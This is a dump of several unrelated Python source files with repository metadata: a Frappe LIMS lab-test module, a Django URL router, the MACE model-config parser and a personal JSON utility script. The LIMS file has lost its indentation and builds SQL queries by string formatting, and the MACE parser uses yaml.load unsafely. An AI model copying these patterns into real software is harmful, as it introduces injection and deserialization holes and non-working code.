enqueue(method=append_same_category_tests,name=doc.get('name'), queue='short', timeout=600)
enqueue(method=tetst_age_fix, queue='short', timeout=600)
# test_sharing_sample_with = doc.get('share_sample_with')
# frappe.msgprint("sharing sample " + test_sharing_sample_with)
# if test_sharing_sample_with:
# frappe.db.set_value('Lab Test', test_sharing_sample_with,{'share_sample_with': doc.name})
# tests_sharing_sample = frappe.db.get_all('Lab Test Sample Share',filters={'parent':doc.name},fields=['name','lab_test'])
# if len(tests_sharing_sample)>0:
# for test in tests_sharing_sample:
# lab_test = frappe.get_doc('Lab Test',test['lab_test'])
# test_item = lab_test.append('lab_test_sample_share')
# test_item.lab_test = test['lab_test']
# lab_test.save(ignore_permissions=True)
# frappe.msgprint('updated related')
def age_calc(dob,lab_name=''):
currentDate = date.today()#nowdate() #datetime.datetime.now()
# dob = '2022-05-01'
# deadline= dob #input ('Plz enter your date of birth (mm/dd/yyyy) ')
deadlineDate= dob# datetime.datetime.strptime(deadline,'%Y-%m-%d')
# print (type(deadlineDate))
# print (type(currentDate))
daysLeft = currentDate - deadlineDate
# print(daysLeft)
years = ((daysLeft.total_seconds())/(365.242*24*3600))
yearsInt=int(years)
months=(years-yearsInt)*12
monthsInt=int(months)
days=(months-monthsInt)*(365.242/12)
daysInt=int(days)
hours = (days-daysInt)*24
hoursInt=int(hours)
if yearsInt>0:
# if yearsInt>100:
# enqueue(method=log_error ,lab_name=lab_name,dob=dob, queue='short', timeout=600)
# # print("{0}Y".format(yearsInt))
# else:
return "{0}Y".format(yearsInt)
if monthsInt>0:
# print("{0}M".format(monthsInt))
return "{0}M".format(monthsInt)
if daysInt>0:
# print("{0}D".format(daysInt))
return "{0}D".format(daysInt)
if hoursInt>0:
# print("{0}H".format(hoursInt))
return "{0}H".format(hoursInt)
# bench execute lims.doc_hooks.lab_test.age_test
def age_test():
pats = frappe.get_all('Lab Test',fields=['name','patient'],filters={'patient':'1122083'})
for p in pats:
print(p['name'])
dob = frappe.db.get_value('Patient',{ 'name': p['patient'] }, 'dob')
# print(type(dob))
print(str(dob))
age = age_calc(dob,p['name'])
print('age ',age)
# frappe.db.set_value('Lab Test',p['name'],{'patient_age':age})
# bench execute lims.doc_hooks.lab_test.append_same_category_tests
@frappe.whitelist()
def append_same_category_tests(name):
from mtrh_dev.mtrh_dev.utilities import get_link_to_form_new_tab
# from clinical.hook.lab_test import get_sample_shares
# name='3BQ'
lab_doc = frappe.get_doc('Lab Test',name)
sql="""select tlt.name,tlt.template,tlt.workflow_state,ltc.test_group,ltc.lab_test_template,tlt.patient from `tabLab Test` tlt RIGHT join `tabLab Test Codes` ltc on tlt.template=ltc.lab_test_template where tlt.patient='{0}' and tlt.docstatus=0""".format(lab_doc.patient)
# tlt.workflow_state='To Receive' and and tlt.template='{1}' ,doc.template
# print(sql)
# link_arr=[]
name_arr=[]
res = frappe.db.sql(sql,as_dict=1)
names = [x.name for x in res]
for n in names:
# link_arr.append(get_link_to_form_new_tab(doctype="Lab Test", name=n, label=n))
name_arr.append({'name':get_link_to_form_new_tab(doctype="Lab Test", name=n, label=n) ,'Test':frappe.db.get_value('Lab Test',n,'template'),'workflow_state':frappe.db.get_value('Lab Test',n,'workflow_state')})
update_sample_share(n,names)
# frappe.msgprint(title='Labs Sharing Same Sample',msg=str(name_arr))
get_sample_shares(name)
return name_arr
def update_sample_share(name,names):
lab_doc = frappe.get_doc('Lab Test',name)
for n in names:
if n!= lab_doc.get('name'):
if not frappe.db.exists('Lab Test Sample Share',{'parent':name,'lab_test':n}):
sample_share = lab_doc.append('lab_test_sample_share')
sample_share.lab_test = n
lab_doc.save(ignore_permissions=True)
def get_sample_shares(lab_name):
tests_sharing_sample_child = frappe.db.get_all('Lab Test Sample Share',filters={'lab_test':['IN',lab_name]},fields=['name','lab_test','parent'])
tests_sharing_sample_parent = frappe.db.get_all('Lab Test Sample Share',filters={'parent':lab_name},fields=['name','lab_test','parent'])
tests_sharing_sample = tests_sharing_sample_parent or tests_sharing_sample_child
test_names = []
if len(tests_sharing_sample)>0:
parent_test = tests_sharing_sample[0]['parent']
tests_sharing_sample = frappe.db.get_all('Lab Test Sample Share',filters={'parent':parent_test},fields=['name','lab_test'])
for test in tests_sharing_sample:
test_names.append(test['lab_test'])
test_names.append(lab_name)
else:
test_names.append(lab_name)
shares = list(dict.fromkeys(test_names))
process_lab_array= frappe.db.get_all('Lab Test',filters={'name':['IN',shares]},fields=['processing_lab'])
employee_array = frappe.db.get_all('Lab Test',filters={'name':['IN',shares]},fields=['employee'])
process_lab=''
employee=''
# print(str(process_lab))
# print(str(employee))
for l in process_lab_array:
if l.processing_lab:
process_lab = l.processing_lab
for e in employee_array:
if e.employee:
employee = e.employee
for n in shares:
print(n)
# bulk_workflow_update(docname=n,process_lab=process_lab,employee=employee)
def bulk_workflow_update(docname,process_lab='',employee=''):
from frappe.model.workflow import apply_workflow
doc=frappe.get_doc('Lab Test',docname )#'IP'ß
# print(get_sample_shares(doc.name))
# actions=['Forward For Payment','Approve Payment','Send To Lab','Receive Lab Test','Forward For Verification']
# state_action_dict=[
# { 'state':'Awaiting Checkin','action':actions[0]},
# { 'state':'Awaiting Payment','action':actions[1]},
# { 'state':'Awaiting Sampling','action':actions[2]},
# { 'state':'To receive','action':actions[3]},
# { 'state':'Processing','action':actions[4]},
# { 'state':'Awaiting Verification','action':actions[5]}
# ]
workflow_state = doc.get('workflow_state')
if workflow_state=='Awaiting Checkin':
apply_workflow(doc=doc, action="Forward For Payment")
if workflow_state=='Awaiting Payment':
# apply_workflow(doc=doc, action="Approve Payment")
re_eveluate_sales_orders(patient_name=doc.patient,lab_name=doc.name)
apply_workflow(doc=doc, action="Approve Payment")
if workflow_state=='Awaiting Sampling':
doc.processing_lab = process_lab
doc.employee = employee
doc.save(ignore_permissions=True)
apply_workflow(doc=doc, action="Send To Lab")
if workflow_state=='To receive':
doc.processing_lab = process_lab
doc.employee = employee
doc.save(ignore_permissions=True)
apply_workflow(doc=doc, action="Receive Lab Test")
if workflow_state=='Processing':
apply_workflow(doc=doc, action="Forward For Verification")
if workflow_state=='Awaiting Verification':
apply_workflow(doc=doc, action="Post Lab Test")
# bench execute lims.doc_hooks.lab_test.lab_clean
def lab_clean():
sql = "select name,idx from `tabNormal Test Result` where parent='B73'"
items=frappe.db.sql(sql,as_dict=1)
count = 0
for i in items:
count +=1
if count>1:
sq= "delete from `tabNormal Test Result` where name='{0}'".format(i.name)
frappe.db.sql(sq,as_dict=1)
print(count)
# bench execute lims.doc_hooks.lab_test.comment_count
def comment_count(name='B73'):
# return 1
sqlc="select count(name) as cnt,reference_name from tabComment where reference_doctype='Sales Invoice' and reference_name is not null group by reference_name HAVING COUNT(name) > 15 order by reference_name"
parents=frappe.db.sql(sqlc,as_dict=1)
for p in parents:
print('ref ',p.reference_name, ' ',p.cnt)
sql = "select name,reference_doctype,reference_name from tabComment where reference_name='{0}'".format(p.reference_name)
# print(sql)
items=frappe.db.sql(sql,as_dict=1)
count = 0
for i in items:
count +=1
if count>1:
print('item count ',count)
sq= "delete from tabComment where name='{0}'".format(i.name)
frappe.db.sql(sq,as_dict=1)
# frappe.delete_doc('Comment',i.name)
frappe.db.commit()
# print(count)
# bench execute lims.doc_hooks.lab_test.tetst_age_fix
def tetst_age_fix():
sql = "select name,patient,docstatus from `tabLab Test` where patient_age is null;"
labs = frappe.db.sql(sql,as_dict=1)
for lab in labs:
patient = lab.get('patient')
# print(' patient ', patient)
dob = frappe.db.get_value('Patient',{ 'name':patient }, 'dob')
patient_age = age_calc(dob,lab.get('name'))
# print(patient_age)
up_sq = "update `tabLab Test` set patient_age ='{0}' where name='{1}';".format(patient_age,lab.get('name'))
print(up_sq)
frappe.db.sql(up_sq,as_dict=1)
def log_error(lab_name,dob):
log = frappe.new_doc('Lims Error Log')
log.ordernumber = lab_name
log.log_number = ''
log.unprocessed_result = str(dob)
log.save(ignore_permissions=True)
# bench execute lims.doc_hooks.lab_test.patient_record_exist
def patient_record_exist():
# labs = frappe.get_all("Lab Test",filters={'docstatus':1},fields=['name','patient'])
labs = frappe.db.count('Lab Test', {'docstatus': 1})
recs = frappe.db.count('Patient Medical Record', {'reference_doctype': 'Lab Test'})
print('labs ',labs, ' recs ',recs) | mudux/lims | lims/doc_hooks/lab_test.py | lab_test.py | py | 11,016 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.date.today",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "frappe.db.get_value",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "frappe.db",
... |
40423351728 | from django.urls import path, include
from . import views
from rest_framework import routers
route = routers.DefaultRouter()
route.register("user", views.UserViewSet, basename='user')
route.register("tuyenxe", views.TuyenXeViewset, basename='tuyenxe')
route.register("chuyenxe", views.ChuyenXeViewset, basename='chuyenxe')
route.register("datve", views.DatVeViewset, basename='datve')
route.register(prefix='comments', viewset=views.CommentViewSet, basename='comment')
# route.register("thongke", views.ThongKeViewSet, basename='thongke')
urlpatterns = [
path('', include(route.urls)),
]
| TamHoang1512/backend-django | QuanLyXeKhach/quanly/urls.py | urls.py | py | 595 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.routers.DefaultRouter",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "rest_framework.routers",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.urls.path",
"line_number": 15,
"usage_type": "call"
},
{
"api_na... |
15733574091 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import os
import copy
import yaml
from enum import Enum
from utils.util import mace_check
from utils.util import MaceLogger
from py_proto import mace_pb2
CPP_KEYWORDS = [
'alignas', 'alignof', 'and', 'and_eq', 'asm', 'atomic_cancel',
'atomic_commit', 'atomic_noexcept', 'auto', 'bitand', 'bitor',
'bool', 'break', 'case', 'catch', 'char', 'char16_t', 'char32_t',
'class', 'compl', 'concept', 'const', 'constexpr', 'const_cast',
'continue', 'co_await', 'co_return', 'co_yield', 'decltype', 'default',
'delete', 'do', 'double', 'dynamic_cast', 'else', 'enum', 'explicit',
'export', 'extern', 'false', 'float', 'for', 'friend', 'goto', 'if',
'import', 'inline', 'int', 'long', 'module', 'mutable', 'namespace',
'new', 'noexcept', 'not', 'not_eq', 'nullptr', 'operator', 'or', 'or_eq',
'private', 'protected', 'public', 'register', 'reinterpret_cast',
'requires', 'return', 'short', 'signed', 'sizeof', 'static',
'static_assert', 'static_cast', 'struct', 'switch', 'synchronized',
'template', 'this', 'thread_local', 'throw', 'true', 'try', 'typedef',
'typeid', 'typename', 'union', 'unsigned', 'using', 'virtual', 'void',
'volatile', 'wchar_t', 'while', 'xor', 'xor_eq', 'override', 'final',
'transaction_safe', 'transaction_safe_dynamic', 'if', 'elif', 'else',
'endif', 'defined', 'ifdef', 'ifndef', 'define', 'undef', 'include',
'line', 'error', 'pragma',
]
def sanitize_load(s):
# do not let yaml parse ON/OFF to boolean
for w in ["ON", "OFF", "on", "off"]:
s = re.sub(r":\s+" + w + "$", r": '" + w + "'", s)
# sub ${} to env value
s = re.sub(r"\${(\w+)}", lambda x: os.environ[x.group(1)], s)
return yaml.load(s)
def parse(path):
with open(path) as f:
config = sanitize_load(f.read())
return config
def parse_device_info(path):
conf = parse(path)
return conf["devices"]
class ModelKeys(object):
platform = "platform"
runtime = "runtime"
models = 'models'
graph_optimize_options = "graph_optimize_options"
input_tensors = "input_tensors"
input_shapes = "input_shapes"
input_data_types = "input_data_types"
input_data_formats = "input_data_formats"
input_ranges = "input_ranges"
output_tensors = "output_tensors"
output_shapes = "output_shapes"
output_data_types = "output_data_types"
output_data_formats = "output_data_formats"
check_tensors = "check_tensors"
check_shapes = "check_shapes"
model_file_path = "model_file_path"
model_sha256_checksum = "model_sha256_checksum"
weight_file_path = "weight_file_path"
weight_sha256_checksum = "weight_sha256_checksum"
quantize_range_file = "quantize_range_file"
quantize = "quantize"
quantize_schema = "quantize_schema"
quantize_large_weights = "quantize_large_weights"
quantize_stat = "quantize_stat"
change_concat_ranges = "change_concat_ranges"
winograd = "winograd"
cl_mem_type = "cl_mem_type"
data_type = "data_type"
subgraphs = "subgraphs"
validation_inputs_data = "validation_inputs_data"
class DataFormat(Enum):
NONE = 0
NHWC = 1
NCHW = 2
HWIO = 100
OIHW = 101
HWOI = 102
OHWI = 103
AUTO = 1000
def parse_data_format(str):
str = str.upper()
mace_check(str in [e.name for e in DataFormat],
"unknown data format %s" % str)
return DataFormat[str]
class DeviceType(Enum):
CPU = 0
GPU = 2
HEXAGON = 3
HTA = 4
APU = 5
CPU_GPU = 100
DEVICE_MAP = {
"cpu": DeviceType.CPU,
"gpu": DeviceType.GPU,
"hexagon": DeviceType.HEXAGON,
"dsp": DeviceType.HEXAGON,
"hta": DeviceType.HTA,
"apu": DeviceType.APU,
"cpu+gpu": DeviceType.CPU_GPU
}
def parse_device_type(str):
mace_check(str in DEVICE_MAP, "unknown device %s" % str)
return DEVICE_MAP[str]
class Platform(Enum):
TENSORFLOW = 0
CAFFE = 1
ONNX = 2
MEGENGINE = 3
KERAS = 4
PYTORCH = 5
def parse_platform(str):
str = str.upper()
mace_check(str in [e.name for e in Platform],
"unknown platform %s" % str)
return Platform[str]
DATA_TYPE_MAP = {
'float32': mace_pb2.DT_FLOAT,
'int32': mace_pb2.DT_INT32,
}
def parse_data_type(str):
if str == "float32":
return mace_pb2.DT_FLOAT
if str == "float16":
return mace_pb2.DT_FLOAT16
elif str == "int32":
return mace_pb2.DT_INT32
else:
mace_check(False, "data type %s not supported" % str)
def parse_internal_data_type(str):
if str == 'fp32_fp32':
return mace_pb2.DT_FLOAT
elif str == 'bf16_fp32':
return mace_pb2.DT_BFLOAT16
elif str == 'fp16_fp16':
return mace_pb2.DT_FLOAT16
else:
return mace_pb2.DT_HALF
def to_list(x):
if isinstance(x, list):
return x
else:
return [x]
def parse_int_array(xs):
if len(xs) is 0:
return [1]
return [int(x) for x in xs.split(",")]
def parse_float_array(xs):
return [float(x) for x in xs.split(",")]
def normalize_input_data_types(conf, input_count):
default_input_dt = conf[ModelKeys.data_type]
if default_input_dt == mace_pb2.DT_HALF:
default_input_dt = mace_pb2.DT_FLOAT # Compatible with old version
conf_input_dts = to_list(conf.get(ModelKeys.input_data_types, []))
if len(conf_input_dts) == 0:
input_data_types = [default_input_dt]
else:
input_data_types = [parse_data_type(dt) for dt in conf_input_dts]
if len(input_data_types) == 1 and input_count > 1:
input_data_types = [input_data_types[0]] * input_count
mace_check(len(input_data_types) == input_count,
"the number of input_data_types should be "
"the same as input tensors")
conf[ModelKeys.input_data_types] = input_data_types
def normalize_output_data_types(conf, output_count):
default_output_dt = conf[ModelKeys.data_type]
if default_output_dt == mace_pb2.DT_HALF:
default_output_dt = mace_pb2.DT_FLOAT # Compatible with old version
conf_output_dts = to_list(conf.get(ModelKeys.output_data_types, []))
if len(conf_output_dts) == 0:
output_data_types = [default_output_dt]
else:
output_data_types = [parse_data_type(dt) for dt in conf_output_dts]
if len(output_data_types) == 1 and output_count > 1:
output_data_types = [output_data_types[0]] * output_count
mace_check(len(output_data_types) == output_count,
"the number of output_data_types should be "
"the same as output tensors")
conf[ModelKeys.output_data_types] = output_data_types
def normalize_model_config(conf):
conf = copy.deepcopy(conf)
if ModelKeys.subgraphs in conf:
subgraph = conf[ModelKeys.subgraphs][0]
del conf[ModelKeys.subgraphs]
conf.update(subgraph)
conf[ModelKeys.platform] = parse_platform(conf[ModelKeys.platform])
conf[ModelKeys.runtime] = parse_device_type(conf[ModelKeys.runtime])
if ModelKeys.quantize in conf and conf[ModelKeys.quantize] == 1:
conf[ModelKeys.data_type] = mace_pb2.DT_FLOAT
else:
if ModelKeys.data_type in conf:
conf[ModelKeys.data_type] = parse_internal_data_type(
conf[ModelKeys.data_type])
else:
conf[ModelKeys.data_type] = mace_pb2.DT_HALF
# parse input
conf[ModelKeys.input_tensors] = to_list(conf[ModelKeys.input_tensors])
conf[ModelKeys.input_tensors] = [str(i) for i in
conf[ModelKeys.input_tensors]]
input_count = len(conf[ModelKeys.input_tensors])
conf[ModelKeys.input_shapes] = [parse_int_array(shape) for shape in
to_list(conf[ModelKeys.input_shapes])]
mace_check(
len(conf[ModelKeys.input_shapes]) == input_count,
"input node count and shape count do not match")
normalize_input_data_types(conf, input_count)
input_data_formats = [parse_data_format(df) for df in
to_list(conf.get(ModelKeys.input_data_formats,
["NHWC"]))]
if len(input_data_formats) == 1 and input_count > 1:
input_data_formats = [input_data_formats[0]] * input_count
mace_check(len(input_data_formats) == input_count,
"the number of input_data_formats should be "
"the same as input tensors")
conf[ModelKeys.input_data_formats] = input_data_formats
input_ranges = [parse_float_array(r) for r in
to_list(conf.get(ModelKeys.input_ranges,
["-1.0,1.0"]))]
if len(input_ranges) == 1 and input_count > 1:
input_ranges = [input_ranges[0]] * input_count
mace_check(len(input_ranges) == input_count,
"the number of input_ranges should be "
"the same as input tensors")
conf[ModelKeys.input_ranges] = input_ranges
# parse output
conf[ModelKeys.output_tensors] = to_list(conf[ModelKeys.output_tensors])
conf[ModelKeys.output_tensors] = [str(i) for i in
conf[ModelKeys.output_tensors]]
output_count = len(conf[ModelKeys.output_tensors])
conf[ModelKeys.output_shapes] = [parse_int_array(shape) for shape in
to_list(conf[ModelKeys.output_shapes])]
mace_check(len(conf[ModelKeys.output_tensors]) == output_count,
"output node count and shape count do not match")
normalize_output_data_types(conf, output_count)
output_data_formats = [parse_data_format(df) for df in
to_list(conf.get(ModelKeys.output_data_formats,
["NHWC"]))]
if len(output_data_formats) == 1 and output_count > 1:
output_data_formats = [output_data_formats[0]] * output_count
mace_check(len(output_data_formats) == output_count,
"the number of output_data_formats should be "
"the same as output tensors")
conf[ModelKeys.output_data_formats] = output_data_formats
if ModelKeys.check_tensors in conf:
conf[ModelKeys.check_tensors] = to_list(conf[ModelKeys.check_tensors])
conf[ModelKeys.check_shapes] = [parse_int_array(shape) for shape in
to_list(conf[ModelKeys.check_shapes])]
mace_check(len(conf[ModelKeys.check_tensors]) == len(
conf[ModelKeys.check_shapes]),
"check tensors count and shape count do not match.")
MaceLogger.summary(conf)
return conf | SheepHuan/CoDL-Mace | codl-mobile/tools/python/utils/config_parser.py | config_parser.py | py | 10,751 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.sub",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "yaml.load",
"line_number": 44,
... |
45097764726 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 18:29:51 2020
@author: rosaz
"""
import argparse
import sys
import errno
import os
import json
import numpy as np
from matplotlib import pyplot as plt
from numpy import array
import torch
import jsonschema
from torch.nn import functional as F
def writeJsonNorma(path,media,dev,time):
"""serve"""
#media = media.tolist()
#dev = dev.tolist()
if not os.path.exists(path):
entry={"normalize":{"mean":media,"dev_std":dev,"time":time}}
with open(path, "w") as outfile:
json.dump(entry,outfile,indent=2)
else:
with open(path, "r") as outfile:
data=json.load(outfile)
if not (data.get("normalize") is None):
#print("value is present for given JSON key")
#print(data.get("normalize"))
#aggiungi chiavi
entry ={"media":media,"dev":dev,"computeTime":time}
data["normalize"]=entry
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
entry ={"media":media,"dev":dev,"computeTime":time}
data["normalize"]=entry
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
"""
if not (data.get(dev) is None):
#print("value is present for given JSON key")
print(data.get(dev))
#aggiungi chiavi
data["dev_std"]=dev
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
data["dev_std"]=dev
with open(path, "w") as outfile:
json.dump(data,outfile)
if not (data.get(time) is None):
#print("value is present for given JSON key")
print(data.get(time))
#aggiungi chiavi
data["time"] = time
with open(path, "w") as outfile:
json.dump(data,outfile)
else:
data["time"] = time
with open(path, "w") as outfile:
json.dump(data,outfile)
"""
def controlFile2():
try:
with open("Dataset/train.csv") as f:
print("ok")
with open("Dataset/valid.csv") as f:
print("ok")
with open("Dataset/test.csv") as f:
print("ok")
# File exists
except IOError as e:
print("fatal error", file=sys.stderr)
exit()
# Raise the exception if it is not ENOENT (No such file or directory)
if e.errno != errno.ENOENT:
print("fatal error", file=sys.stderr)
exit(0)
print("ciao")
def createFolder(path):
access_rights = 0o777
try:
if not os.path.exists(path):
os.mkdir(path,access_rights)
except OSError:
print("Creation of the directory %s failed" % path)
else:
print("exist the directory %s" % path)
def controlFile(path):
try:
with open(path+"\\normalize.json") as f:
response = input("Do you want to re-calculate the mean and standard deviation? y | n : ")
if(response =="y"):
print("recalculate")
elif (response =="n"):
print("no")
else:
controlFile()
except IOError as e:
print("Normalize")
# Raise the exception if it is not ENOENT (No such file or directory)
if e.errno != errno.ENOENT:
print("fatal error", file=sys.stderr)
exit(0)
def readNorm(path):
with open(path+'\\normalize.json') as json_file:
data = json.load(json_file)
arrayMean = data["mean"]
arrayDev = data["dev_std"]
arrayMean = tuple(arrayMean)
arrayDev = tuple(arrayDev)
return arrayMean , arrayDev
"""""fuzione che aggiunge nuove keys se non esistono, mentre aggiorna valori se le chiavi esistono """
def controlNormalize(path):
#controlla se è presente la directory, altrimenti la crea
createFolder(path)
#print("Controll")
if not os.path.exists(path+'\\dataSetJson.json'):
print("1) Checking: mean, dev_std")
else: # se il file esiste controlla se ci sono le key mean e dev
try:
with open(path+"\\dataSetJson.json","r") as json_file:
data = json.load(json_file)
print(path+"\\dataSetJson.json")
if not (data.get('normalize') is None):
norm = data['normalize']
print(norm)
if not (norm.get('mean') and norm.get('dev_std')) is None:
response = input("Do you want to re-calculate the mean and standard deviation? y | n : ")
if(response =="y"):
print("recalculate")
elif (response =="n"):
print("bypass this step!!")
media = tuple(norm['mean'])
print(media)
dev= tuple(norm['dev_std'])
print(dev)
else:
controlNormalize()
else:
print("non esiste mean e dev_std, ricalcola")
else:
print("non esiste normalize")
except:
# se il parsing è errato ricalcola la media e dev
print("Il parsing è errato")
def writeJsonAccuracy(path, fileName, entry, accuracy, entryTime, time):
#a_cc = {entry: accuracy}
#timeTrain = {entryTime: time}
# se il file non esistw crealo nuovo e scrivi l'oggetto
createFolder(path)
if not os.path.exists(path+"\\"+fileName):
print("File non esiste")
entry = {entry: accuracy, entryTime: time}
with open(path+"\\"+fileName,"w") as outfile:
json.dump(entry,outfile)
#altrimenti se il file esiste
#prova a fare il parsing
else:
print("Qui")
try:
# Read in the JSON document, parsing è stato effettuato con successo
with open(path+"\\"+fileName,"r") as outfile:
print("qui3")
datum = json.load(outfile)
# modifica il valore della chiave se esiste
if not (datum.get(entry) is None):
print("value is present for given JSON key")
print(datum.get(entry))
datum[entry]=accuracy
with open(path+"\\"+fileName, "w") as outfile:
json.dump(datum, outfile)
else:
print("Chiave non esiste")
#entry = {entry: accuracy, entryTime: time}
datum[entry]=accuracy
with open(path+"\\"+fileName, "w") as json_outfile:
json.dump(datum, json_outfile)
if not (datum.get(entryTime) is None):
print("value is present for given JSON key")
print(datum.get(entryTime))
datum[entryTime]=time
with open(path+"\\"+fileName, "w") as json_outfile:
json.dump(datum, json_outfile)
else:
print("Chiave non esiste")
datum[entryTime]=time
with open(path+"\\"+fileName, "w") as json_outfile:
json.dump(datum,json_outfile)
except:
print("Qui2")
entry = {entry: accuracy, entryTime: time}
with open(path+"\\"+fileName, "w") as outfile:
json.dump(entry,outfile)
def plot(path="Model-1"):
plt.figure()
plt.subplot(121)
plt.ylabel('loss train')
plt.xlabel('num samples')
plt.grid()
plt.plot( [1, 2, 3, 4], [1, 4, 9, 16])
plt.subplot(122)
plt.plot([1, 2, 3, 3,2,4], [1,5,6, 4, 9, 16])
plt.ylabel('loss validation')
plt.xlabel('num samples')
plt.grid()
plt.savefig(path+'\\filename.png', dpi = 600)
plt.show()
def writeJsonAppend(path, num, accuracy):
entry = {'acc': accuracy, 'time': "wdd"}
a = []
if not os.path.isfile(path+"\\nuovo.json"):
a.append(entry)
with open(path+"\\nuovo.json", mode='w') as f:
f.write(json.dumps(a, indent=2))
else:
with open(path+"\\nuovo.json") as feedsjson:
feeds = json.load(feedsjson)
feeds.append(entry)
with open(path+"\\nuovo.json", mode='w') as f:
f.write(json.dumps(feeds, indent=2))
def writeJsonUpdate(path, num, accuracy):
entry = {'acc': accuracy, 'time': "wdd"}
a = []
if not os.path.isfile(path+"\\nuovo.json"):
a.append(entry)
with open(path+"\\nuovo.json", mode='w') as f:
f.write(json.dumps(a, indent=2))
else:
with open(path+"\\nuovo.json") as feedsjson:
feeds = json.load(feedsjson)
if feeds["accuracy"]:
feeds["acc"]=2
f.write(json.dumps(feeds, indent=2))
with open(path+"\\nuovo.json", mode='w') as f:
f.write(json.dumps(feeds, indent=2))
def arrayLogic():
x = np.array([4, 3,3,3,3, 2, 1])
print(x)
print(type(x))
print(len(x))
y=[]
for el in x:
if el==3:
y.append(1)
else:
y.append(0)
print(y)
"""
print(y)
print(type(y))
print(len(y))"""
def distanza():
A = torch.Tensor([
[[1,2,3], [4,5,6], [7,8,9]],
[[11,12,13], [14,15,16], [17,18,19]],
[[21,22,23], [24,25,26], [27,28,29]],
])
print(A)
print(A.size())
margin = 2
margin2 = 1
B = torch.Tensor([
[[1,2,3], [4,5,6], [7,8,9]],
[[11,12,13], [14,15,16], [17,18,19]],
[[21,22,23], [24,25,26], [27,28,29]],
])
C = A*4
d = F.pairwise_distance(A, B)
print("di",d)
print("Margin-di",margin-d)
tensor = torch.clamp( margin-d, min = 0) # sceglie il massimo -- se è zero allora sono dissimili
print("max m-d",tensor)
tensorSimil= torch.Tensor([0])
tensorDissimil= torch.Tensor([1])
result= torch.where(tensor==0.,tensorDissimil, tensorSimil)
print("max result Label", result)
print(result[0][0])
if(result[0][0]==1.):
label= 1
print("Dissimili",label)
else:
label = 0
print("Simil",label)
di = F.pairwise_distance(A, C)
print("di",di)
print("Margin-di",margin-di)
tensor = torch.clamp( margin-di, min = 0) # sceglie il massimo -- se è zero allora sono dissimili
print("max m-d",tensor)
tensorSimil= torch.Tensor([0])
tensorDissimil= torch.Tensor([1])
result= torch.where(tensor==0.,tensorDissimil, tensorSimil)
print("max result Label", result)
print(result[0][0])
if(result[0][0]==1.):
label= 1
print("Dissimili",label)
else:
label = 0
print("Simil",label)
#matrix = tensor.numpy()
#print("Matrix",matrix.ravel(), type(matrix))
#list(matrix)
#print(np.all([n<=margin for n in tensor]))
"""
if(tensor <= margin):
print("Simili A e B")
else:
print("Dissimili A e B")
"""
def readFileDataset(path,entry):
if not os.path.exists(path):
print("Dataset is not present, try --create dataset", file=sys.stderr)
exit(0)
else:
with open(path, "r") as outfile:
data= json.load(outfile)
if not (data.get(entry) is None):
value = data[entry]
return value
def lengthDataset(path,entry,key):
somma = 0
if not os.path.exists(path):
print("Dataset is not present, try --create dataset", file=sys.stderr)
exit(0)
else:
with open(path, "r") as outfile:
data= json.load(outfile)
if not (data.get(entry) is None):
value = data[entry]
for obj in value:
if not (obj.get(key) is None):
num = obj[key]
somma = somma + num
return somma
def print_to_stderr(*a):
# Here a is the array holding the objects
# passed as the arguement of the function
print(*a, file = sys.stderr)
## AGGIIUNGI FUNZIONA
def addJsonModel(directory,version, acc ,f1score, precision, recall, time):
path = "provaJson.json"
if not os.path.exists(path):
print("File %s not is exists" % path)
sys.stderr.write("File %s not is exists" % path)
exit(0)
else:
#leggi il file
with open(path, "r") as outfile:
data = json.load(outfile)
if not (data.get(version) is None): # se la versione esiste gia, aggiorna i campi
print(data.get(version))
versione = data[version]
if not (versione.get("accuracy") is None): # se la chiave accuracy esiste, aggiorna i campi
obj = versione["accuracy"]
if not (obj.get("accuracyTets") is None):
obj["accuracyTest"]=acc
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
obj["accuracyTest"]=acc
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
print("non esiste")
value={"accuracyTest":acc}
versione["accuracy"]=value
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
#accuracy, accuracyTest ,joj
def addValueJsonModel(path,num, key ,entry, value):
path = "provaJson.json"
if not os.path.exists(path):
print("File %s not is exists" % path)
sys.stderr.write("File %s not is exists" % path)
exit(0)
else:
#leggi il file
with open(path, "r") as outfile:
data = json.load(outfile)
if not (data.get(num) is None): # se la versione esiste gia, aggiorna i campi
print(data.get(num))
versione = data[num]
if not (versione.get(key) is None): # se la chiave accuracy esiste, aggiorna i campi
obj = versione[key]
if not (obj.get(entry) is None):
obj[entry]=value
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
obj[entry]=value
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
print("non esiste")
obj={entry:value}
versione[entry]=obj
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
dato={key:{entry:value}}
data[num]=dato
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
def writeJson(model,num, media, dev, time):
path = model
access_rights = 0o777
try:
if not os.path.exists(path):
os.mkdir(path,access_rights)
print("Successfully created the directory %s" % path)
else:
print("Directory exist")
except OSError:
print("Creation of the directory %s failed" % path)
exit(0)
data = {"model":num, "mean":media, "dev_std":dev, "time":time}
with open(path+"\\normalize.json", "w") as outfile:
json.dump(data,outfile)
# No such file or directory
"""
a = np.arange(10).reshape(2,5) # a 2 by 5 array
b = a.tolist()
writeJson("Model-1",b,1243,33,"2e33333sec")
"""
#controlFile("Model-1")
#arrayM, arrayD = readNorm("Model-1")
#print(arrayM)
#print(arrayD)
#plot("Model-1")
entry= "acc"
entryTime="nuvissima"
time="3haf"
accuracy =125
path="Model-1"
